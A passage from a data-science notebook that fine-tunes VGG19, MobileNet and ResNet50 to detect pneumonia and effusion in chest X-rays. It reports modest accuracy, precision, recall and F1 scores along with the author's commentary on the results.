print('Accuracy of MobileNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_baseline_acc_scores) * 100, np.std(mobilenet_baseline_acc_scores)*100))
print('Precision of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_prec_scores), np.std(mobilenet_baseline_prec_scores)))
print('Recall of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_recall_scores), np.std(mobilenet_baseline_recall_scores)))
print('f1 score of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_f1_scores), np.std(mobilenet_baseline_f1_scores)))
###Output
Accuracy of MobileNet baseline model: 50.47 +/- 2.28%
Precision of MobileNet baseline model: 0.488 +/- 0.079
Recall of MobileNet baseline model: 0.344 +/- 0.314
f1 score of MobileNet baseline model: 0.325 +/- 0.231
###Markdown
3.2.2 - MobileNet Training Layers with Pneumonia ImagesThere are ~85 layers in the MobileNet model, so its more difficult to find the sweet spot of how many layers to train compared to VGG. Due to time, I trained up to the last 25 layers, and found that the optimal number of trainable layers is 21. Accuracy is slightly higher, at 53%, but the precision has stayed the same as MobileNet's baseline. Its recall and f1-scores hwoever, have improved so that they are at least 0.6, and generally the standard deviations are more stable.
###Code
mobilenet_frozen_acc_scores = []
mobilenet_frozen_prec_scores = []
mobilenet_frozen_recall_scores = []
mobilenet_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_baseline.layers[:-21]:
layer.trainable = False
mobilenet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_baseline_history = mobilenet_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_baseline,
X_test_pneu_model,
y_test_pneu)
mobilenet_frozen_acc_scores.append(acc)
mobilenet_frozen_prec_scores.append(prec)
mobilenet_frozen_recall_scores.append(recall)
mobilenet_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet model with last 21 layers trained: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_frozen_acc_scores) * 100, np.std(mobilenet_frozen_acc_scores)*100))
print('Precision of MobileNet model with last 21 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_prec_scores), np.std(mobilenet_frozen_prec_scores)))
print('Recall of MobileNet model with last 21 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_recall_scores), np.std(mobilenet_frozen_recall_scores)))
print('f1 score of MobileNet model with last 21 layers trained: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_f1_scores), np.std(mobilenet_frozen_f1_scores)))
###Output
Accuracy of MobileNet model with last 21 layers trained: 53.78 +/- 0.32%
Precision of MobileNet model with last 21 layers trained: 0.522 +/- 0.003
Recall of MobileNet model with last 21 layers trained: 0.876 +/- 0.069
f1 score of MobileNet model with last 21 layers trained: 0.653 +/- 0.018
###Markdown
3.2.3 - Adding Augmented Images to MobileNet with Pneumonia ImagesThe metrics for the baseline augmented model for MobileNet are similar to the metrics for the non-augmented model. One thing to note based on the confusion matrix is that the model seems to heavily class everything as 0 or 1 (not pneumonia vs pneumonia).
###Code
mobilenet_aug_baseline_acc_scores = []
mobilenet_aug_baseline_prec_scores = []
mobilenet_aug_baseline_recall_scores = []
mobilenet_aug_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_aug_baseline.layers:
layer.trainable = False
mobilenet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_baseline_history = mobilenet_model_aug_baseline.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_aug_baseline,
X_test_pneu_model,
y_test_pneu)
mobilenet_aug_baseline_acc_scores.append(acc)
mobilenet_aug_baseline_prec_scores.append(prec)
mobilenet_aug_baseline_recall_scores.append(recall)
mobilenet_aug_baseline_f1_scores.append(f1)
print('Accuracy of MobileNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_baseline_acc_scores) * 100, np.std(mobilenet_aug_baseline_acc_scores)*100))
print('Precision of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_prec_scores), np.std(mobilenet_aug_baseline_prec_scores)))
print('Recall of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_recall_scores), np.std(mobilenet_aug_baseline_recall_scores)))
print('f1 score of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_f1_scores), np.std(mobilenet_aug_baseline_f1_scores)))
###Output
Accuracy of MobileNet augmented baseline model: 49.65 +/- 0.19%
Precision of MobileNet augmented baseline model: 0.405 +/- 0.085
Recall of MobileNet augmented baseline model: 0.341 +/- 0.461
f1 score of MobileNet augmented baseline model: 0.240 +/- 0.300
###Markdown
Fine tuning the training of layers and finding a sweet spot was very difficult for the augmented MobileNet model. At the moment, the best model I found was to train the last 11 layers of the model. This gives similar scores with MobileNet's trained layers, but with larger standard deviations.
###Code
mobilenet_aug_frozen_acc_scores = []
mobilenet_aug_frozen_prec_scores = []
mobilenet_aug_frozen_recall_scores = []
mobilenet_aug_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_frozen=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_aug_frozen.layers[:-11]:
layer.trainable = False
mobilenet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_frozen_history = mobilenet_model_aug_frozen.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(mobilenet_model_aug_frozen,
X_test_pneu_model,
y_test_pneu)
mobilenet_aug_frozen_acc_scores.append(acc)
mobilenet_aug_frozen_prec_scores.append(prec)
mobilenet_aug_frozen_recall_scores.append(recall)
mobilenet_aug_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet augmented model while training last 11 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_frozen_acc_scores) * 100, np.std(mobilenet_aug_frozen_acc_scores)*100))
print('Precision of MobileNet augmented model while training last 11 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_prec_scores), np.std(mobilenet_aug_frozen_prec_scores)))
print('Recall of MobileNet augmented model while training last 11 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_recall_scores), np.std(mobilenet_aug_frozen_recall_scores)))
print('f1 score of MobileNet augmented model while training last 11 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_f1_scores), np.std(mobilenet_aug_frozen_f1_scores)))
###Output
Accuracy of MobileNet augmented model while training last 11 layers: 53.05 +/- 1.12%
Precision of MobileNet augmented model while training last 11 layers: 0.521 +/- 0.010
Recall of MobileNet augmented model while training last 11 layers: 0.797 +/- 0.123
f1 score of MobileNet augmented model while training last 11 layers: 0.626 +/- 0.029
###Markdown
3.2.4 - MobileNet Pnuemonia Summary for Pneumonia ImagesA table that summarizes the results of each of the MobileNet models is below. The two models with trained layers had similar f1-scores, but the baseline model with trained layers had a much higher recall, leading me to pick that as the better model. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| MobileNet baseline | 50.47 +/- 2.28% | 0.488 +/- 0.079 | 0.344 +/- 0.314 | 0.325 +/- 0.231 || MobileNet baseline with training | 53.78 +/- 0.32% | 0.522 +/- 0.003 | 0.876 +/- 0.069 | 0.653 +/- 0.018 || MobileNet augmented baseline | 49.65 +/- 0.19% | 0.405 +/- 0.085 | 0.341 +/- 0.461 | 0.240 +/- 0.300 || MobileNet augmented with training | 53.05 +/- 1.12% | 0.521 +/- 0.010 | 0.797 +/- 0.123 | 0.626 +/- 0.029 | 3.3 - ResNet50 ModelLastly, we have a ResNet model, specifically the ResNet50 model. I chose this model because it gets good results for most image recognition problems. 3.3.1 - ResNet Baseline with Pneumonia ImagesSimilarly to MobileNet, I utilize the include_top = False argument and I have to add the GlobalAveragePooling2D and Dense layers. This model also expects an image size of 224 x 224. I had high hopes that this baseline would be higher than 50%, but it was not to be. The recall is much higher than the other baselines at ~0.86, but I belive this is because the model tends to predict everything to be 1 (has pneumonia). This is a good reminder of why you should check confusion matrices.
###Code
resnet_model = ResNet50(include_top=False, input_shape=(imgSize, imgSize, 3))
resnet_baseline_acc_scores = []
resnet_baseline_prec_scores = []
resnet_baseline_recall_scores = []
resnet_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_baseline=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_baseline.layers:
layer.trainable = False
resnet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_baseline_history = resnet_model_baseline.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(resnet_model_baseline,
X_test_pneu_model,
y_test_pneu)
resnet_baseline_acc_scores.append(acc)
resnet_baseline_prec_scores.append(prec)
resnet_baseline_recall_scores.append(recall)
resnet_baseline_f1_scores.append(f1)
print('Accuracy of ResNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_baseline_acc_scores) * 100, np.std(resnet_baseline_acc_scores)*100))
print('Precision of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_prec_scores), np.std(resnet_baseline_prec_scores)))
print('Recall of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_recall_scores), np.std(resnet_baseline_recall_scores)))
print('f1 score of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_f1_scores), np.std(resnet_baseline_f1_scores)))
###Output
Accuracy of ResNet baseline model: 49.56 +/- 0.65%
Precision of ResNet baseline model: 0.496 +/- 0.005
Recall of ResNet baseline model: 0.862 +/- 0.189
f1 score of ResNet baseline model: 0.622 +/- 0.061
###Markdown
3.3.2 - ResNet50 Training Layers with Pneumonia ImagesI found that the optimal number of layers to train is 22, which has an accuracy that finally breaks past 53%, for an accuracy of ~54%. Not much of an improvement but I was beginning to wonder if any model could break 53%. The precision, recall, and f1-scores all hover at around 0.50.
###Code
resnet_frozen_acc_scores = []
resnet_frozen_prec_scores = []
resnet_frozen_recall_scores = []
resnet_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_frozen=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_frozen.layers[:-22]:
layer.trainable = False
resnet_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_frozen_history = resnet_model_frozen.fit(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, prec, recall, f1 = get_metrics(resnet_model_frozen,
X_test_pneu_model,
y_test_pneu)
resnet_frozen_acc_scores.append(acc)
resnet_frozen_prec_scores.append(prec)
resnet_frozen_recall_scores.append(recall)
resnet_frozen_f1_scores.append(f1)
print('Accuracy of ResNet model while training last 22 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_frozen_acc_scores) * 100, np.std(resnet_frozen_acc_scores)*100))
print('Precision of ResNet model while training last 22 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_prec_scores), np.std(resnet_frozen_prec_scores)))
print('Recall of ResNet model while training last 22 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_recall_scores), np.std(resnet_frozen_recall_scores)))
print('f1 score of ResNet model while training last 22 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_f1_scores), np.std(resnet_frozen_f1_scores)))
###Output
Accuracy of ResNet model while training last 22 layers: 54.47 +/- 2.17%
Precision of ResNet model while training last 22 layers: 0.549 +/- 0.021
Recall of ResNet model while training last 22 layers: 0.493 +/- 0.214
f1 score of ResNet model while training last 22 layers: 0.496 +/- 0.120
###Markdown
3.3.3 - Adding Augmented Images to ResNet Model with Pneumonia ImagesAgain, not too much improvement here over the ResNet baseline model without augmented images. In fact, all the metrics aside from accuracy has a worse score with larger standard deviations.
###Code
resnet_aug_baseline_acc_scores = []
resnet_aug_baseline_prec_scores = []
resnet_aug_baseline_recall_scores = []
resnet_aug_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_baseline=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_aug_baseline.layers:
layer.trainable = False
resnet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_baseline_history = resnet_model_aug_baseline.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_baseline,
X_test_pneu_model,
y_test_pneu)
resnet_aug_baseline_acc_scores.append(acc)
resnet_aug_baseline_prec_scores.append(pres)
resnet_aug_baseline_recall_scores.append(recall)
resnet_aug_baseline_f1_scores.append(f1)
print('Accuracy of ResNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_baseline_acc_scores) * 100, np.std(resnet_aug_baseline_acc_scores)*100))
print('Precision of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_prec_scores), np.std(resnet_aug_baseline_prec_scores)))
print('Recall of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_recall_scores), np.std(resnet_aug_baseline_recall_scores)))
print('f1 score of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_f1_scores), np.std(resnet_aug_baseline_f1_scores)))
###Output
Accuracy of ResNet augmented baseline model: 49.71 +/- 1.15%
Precision of ResNet augmented baseline model: 0.487 +/- 0.022
Recall of ResNet augmented baseline model: 0.665 +/- 0.347
f1 score of ResNet augmented baseline model: 0.517 +/- 0.183
###Markdown
The optimal number of layers to train for the ResNet augmented model is 14. While the accuracy still hovers at ~55%, the recall is at almost 0.90 with a relatively small standard deviation. However, the one must be careful since the confusion matrices show that the model tends to categorize the images as 1 (has pneumonia).
###Code
resnet_aug_frozen_acc_scores = []
resnet_aug_frozen_prec_scores = []
resnet_aug_frozen_recall_scores = []
resnet_aug_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_frozen=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_aug_frozen.layers[:-14]:
layer.trainable = False
resnet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_frozen_history = resnet_model_aug_frozen.fit_generator(gen.flow(X_train_pneu_model,
y_train_pneu_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_pneu_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_pneu_model,
y_val_pneu_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_frozen,
X_test_pneu_model,
y_test_pneu)
resnet_aug_frozen_acc_scores.append(acc)
resnet_aug_frozen_prec_scores.append(pres)
resnet_aug_frozen_recall_scores.append(recall)
resnet_aug_frozen_f1_scores.append(f1)
print('Accuracy of ResNet augmented model while training 14 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_frozen_acc_scores) * 100, np.std(resnet_aug_frozen_acc_scores)*100))
print('Precision of ResNet augmented model while training 14 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_prec_scores), np.std(resnet_aug_frozen_prec_scores)))
print('Recall of ResNet augmented model while training 14 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_recall_scores), np.std(resnet_aug_frozen_recall_scores)))
print('f1 score of ResNet augmented model while training 14 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_f1_scores), np.std(resnet_aug_frozen_f1_scores)))
###Output
Accuracy of ResNet augmented model while training 14 layers: 55.14 +/- 1.34%
Precision of ResNet augmented model while training 14 layers: 0.530 +/- 0.008
Recall of ResNet augmented model while training 14 layers: 0.899 +/- 0.042
f1 score of ResNet augmented model while training 14 layers: 0.667 +/- 0.013
###Markdown
3.3.4 - ResNet50 Pnuemonia Summary for PneumoniaThe table summarizing the ResNet50's metrics is below. Overall, the max f1-score achieved was 0.667 and the max recall was ~0.90. These were attained by the model with augmented images and training layers. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| ResNet50 baseline | 49.56 +/- 0.65% | 0.496 +/- 0.005 | 0.862 +/- 0.189 | 0.622 +/- 0.061 || ResNet50 baseline with training | 54.47 +/- 2.17% | 0.549 +/- 0.021 | 0.493 +/- 0.214 | 0.496 +/- 0.120 || ResNet50 augmented baseline | 49.71 +/- 1.15% | 0.487 +/- 0.022 | 0.665 +/- 0.347 | 0.517 +/- 0.183 || ResNet50 augmented with training | 55.14 +/- 1.34% | 0.530 +/- 0.008 | 0.899 +/- 0.042 | 0.667 +/- 0.013 | 3.4 - Summary of Pneumonia ImagesAs a reminder, a table of the best models from each architecture (VGG, MobileNet, and ResNet) are summarized below. Overall, each model gives similar results, with accuracies between 53-55% and recalls between 0.80 and 0.90. This means that the best model I found (so far...) for identifying images with pneumonia is with ResNet50 with 14 trained layers. However, the other two models aren't too far behind. The low accuracy is a concern to me because it means none of these models do particularly well. I believe part of the problem stems from the training data only having ~1750 images, which is probably not enough to train on. Augmenting images helped a little for the ResNet model, but not enough. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| VGG19 baseline with training | 53.75 +/- 0.43% | 0.525 +/- 0.006 | 0.800 +/- 0.105 | 0.631 +/- 0.031 || MobileNet baseline with training | 53.78 +/- 0.32% | 0.522 +/- 0.003 | 0.876 +/- 0.069 | 0.653 +/- 0.018 || ResNet50 augmented with training | 55.14 +/- 1.34% | 0.530 +/- 0.008 | 0.899 +/- 0.042 | 0.667 +/- 0.013 | 4 - Effusion 4.1 - VGG19 Model for Effusion ImagesI suspected that it was difficult to train pneumonia images due to the low number of images in the training set. One way to test this theory is to use find a pathology with more images. However, with more images comes longer computational times, which is why I chose to train effusion images, which had the second most abundant images in the dataset. As a reference, there are ~14000, ~3500, and ~9200 images total for the training, validation, and test sets.
###Code
# Get test images
Xtest_eff, ytest_eff = get_images(test_df[test_df['Effusion']==1],
'Effusion',
num_images = test_df[test_df['Effusion']==1].shape[0],
imageSize = imgSize)
Xtest_noteff, ytest_noteff = get_images(test_df[test_df['Effusion']==0],
'Effusion',
num_images = test_df[test_df['Effusion']==1].shape[0],
imageSize = imgSize)
X_test_eff = np.concatenate((Xtest_eff, Xtest_noteff), axis = 0)
y_test_eff = np.concatenate((ytest_eff, ytest_noteff))
_, X_test_eff, _, y_test_eff = train_test_split(X_test_eff,
y_test_eff,
test_size=0.99,
random_state=42,
stratify = y_test_eff)
# get training images and split into validation set
Xtrain_eff, ytrain_eff = get_images(train_val_df[train_val_df['Effusion']==1],
'Effusion',
num_images = train_val_df[train_val_df['Effusion']==1].shape[0],
imageSize = imgSize)
Xtrain_noteff, ytrain_noteff = get_images(train_val_df[train_val_df['Effusion']==0],
'Effusion',
num_images = train_val_df[train_val_df['Effusion']==1].shape[0],
imageSize = imgSize)
Xtrain_eff = np.concatenate((Xtrain_eff, Xtrain_noteff), axis = 0)
ytrain_eff = np.concatenate((ytrain_eff, ytrain_noteff))
X_train_eff, X_val_eff, y_train_eff, y_val_eff = train_test_split(Xtrain_eff,
ytrain_eff,
test_size=0.2,
random_state=42,
stratify = ytrain_eff)
X_train_eff_model, X_val_eff_model, X_test_eff_model = convert_X_data(X_train_eff,
X_val_eff,
X_test_eff,
imageSize = imgSize,
num_classes = 2)
y_train_eff_model, y_val_eff_model, y_test_eff_model = convert_y_data(y_train_eff,
y_val_eff,
y_test_eff,
num_classes = 2)
###Output
_____no_output_____
###Markdown
4.1.1 - VGG Baseline for Effusion ImagesThis is the first model for the effusion pathology. Already the metrics are generally higher than that of pneumonia's baselines. Possibly this is just because there are more images the model can train on.
###Code
vgg_baseline_acc_eff_scores = []
vgg_baseline_pres_eff_scores = []
vgg_baseline_recall_eff_scores = []
vgg_baseline_f1_eff_scores = []
for i in range(3):
vgg_model_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_baseline.add(layer)
vgg_model_baseline.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_baseline.layers:
layer.trainable = False
vgg_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_baseline_history = vgg_model_baseline.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_baseline, X_test_eff_model, y_test_eff, verbose = True)
vgg_baseline_acc_eff_scores.append(acc)
vgg_baseline_pres_eff_scores.append(pres)
vgg_baseline_recall_eff_scores.append(recall)
vgg_baseline_f1_eff_scores.append(f1)
print('Accuracy of VGG baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_baseline_acc_eff_scores) * 100, np.std(vgg_baseline_acc_eff_scores)*100))
print('Precision of VGG baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_baseline_pres_eff_scores) * 100, np.std(vgg_baseline_pres_eff_scores)*100))
print('Recall of VGG baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_baseline_recall_eff_scores) * 100, np.std(vgg_baseline_recall_eff_scores)*100))
print('f1 score of VGG baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_baseline_f1_eff_scores) * 100, np.std(vgg_baseline_f1_eff_scores)*100))
###Output
Accuracy of VGG baseline model: 53.09 +/- 1.24%
Precision of VGG baseline model: 53.006 +/- 1.398%
Recall of VGG baseline model: 57.413 +/- 5.408%
f1 score of VGG baseline model: 54.928 +/- 1.630%
###Markdown
4.1.2 - VGG19 Training Layers for Effusion ImagesAfter training the last 2 layers, the accuracy jumps up to 63%, which I'm becoming more convinced is because of the number of images. The precision stays the same but the recall and f1-scores jump to at least 0.67.
###Code
print('Accuracy of baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_baseline_acc_eff_scores) * 100, np.std(vgg_baseline_acc_eff_scores)*100))
print('Accuracy of baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_baseline_pres_eff_scores) * 100, np.std(vgg_baseline_pres_eff_scores)*100))
print('Accuracy of baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_baseline_recall_eff_scores) * 100, np.std(vgg_baseline_recall_eff_scores)*100))
print('f1 score of baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_baseline_f1_eff_scores) * 100, np.std(vgg_baseline_f1_eff_scores)*100))
vgg_frozen_acc_eff_scores = []
vgg_frozen_pres_eff_scores = []
vgg_frozen_recall_eff_scores = []
vgg_frozen_f1_eff_scores = []
for i in range(3):
vgg_model_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_frozen.add(layer)
vgg_model_frozen.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_frozen.layers[:-2]:
layer.trainable = False
vgg_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_frozen_history = vgg_model_frozen.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_frozen, X_test_eff_model, y_test_eff, verbose = True)
vgg_frozen_acc_eff_scores.append(acc)
vgg_frozen_pres_eff_scores.append(pres)
vgg_frozen_recall_eff_scores.append(recall)
vgg_frozen_f1_eff_scores.append(f1)
print('Accuracy of VGG model while training last 2 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_frozen_acc_eff_scores) * 100, np.std(vgg_frozen_acc_eff_scores)*100))
print('Precision of VGG model while training last 2 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_frozen_pres_eff_scores), np.std(vgg_frozen_pres_eff_scores)))
print('Recall of VGG model while training last 2 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_frozen_recall_eff_scores), np.std(vgg_frozen_recall_eff_scores)))
print('f1 score of VGG model while training last 2 layers: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_frozen_f1_eff_scores), np.std(vgg_frozen_f1_eff_scores)))
###Output
Accuracy of VGG model while training last 2 layers: 63.06 +/- 1.92%
Precision of VGG model while training last 2 layers: 0.610 +/- 0.033%
Recall of VGG model while training last 2 layers: 0.764 +/- 0.109%
f1 score of VGG model while training last 2 layers: 0.672 +/- 0.019%
###Markdown
4.1.3 - Adding Augmented Images to VGG19 Effusion ImagesNot much change in accuracy and precision compared to the baseline model. However, recall and f1-scores drop quite a bit, to under 0.15. The confusion matrix shows that the model tends to predict most images as 0 (no effusion), resulting in a mediocre precision and an extremely low recall, which drops the f1-score.
###Code
vgg_aug_baseline_acc_eff_scores = []
vgg_aug_baseline_pres_eff_scores = []
vgg_aug_baseline_recall_eff_scores = []
vgg_aug_baseline_f1_eff_scores = []
for i in range(3):
vgg_model_aug_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_baseline.add(layer)
vgg_model_aug_baseline.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_aug_baseline.layers:
layer.trainable = False
vgg_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_baseline_history = vgg_model_aug_baseline.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_baseline, X_test_eff_model, y_test_eff, verbose = True)
vgg_aug_baseline_acc_eff_scores.append(acc)
vgg_aug_baseline_pres_eff_scores.append(pres)
vgg_aug_baseline_recall_eff_scores.append(recall)
vgg_aug_baseline_f1_eff_scores.append(f1)
print('Accuracy of VGG augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_baseline_acc_eff_scores) * 100, np.std(vgg_aug_baseline_acc_eff_scores)*100))
print('Precision of VGG augmented baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_aug_baseline_pres_eff_scores), np.std(vgg_aug_baseline_pres_eff_scores)))
print('Recall of VGG augmented baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_aug_baseline_recall_eff_scores), np.std(vgg_aug_baseline_recall_eff_scores)))
print('f1 score of VGG augmented baseline model: {:0.3f} +/- {:0.3f}%'.format(np.mean(vgg_aug_baseline_f1_eff_scores), np.std(vgg_aug_baseline_f1_eff_scores)))
###Output
Accuracy of VGG augmented baseline model: 50.05 +/- 0.48%
Precision of VGG augmented baseline model: 0.493 +/- 0.031%
Recall of VGG augmented baseline model: 0.081 +/- 0.040%
f1 score of VGG augmented baseline model: 0.135 +/- 0.059%
###Markdown
Training the last layer of the augmented vgg model improves the recall and therefore f1-score, but they are still not as high as the baseline model with trained layers.
###Code
vgg_aug_frozen_acc_eff_scores = []
vgg_aug_frozen_pres_eff_scores = []
vgg_aug_frozen_recall_eff_scores = []
vgg_aug_frozen_f1_eff_scores = []
for i in range(3):
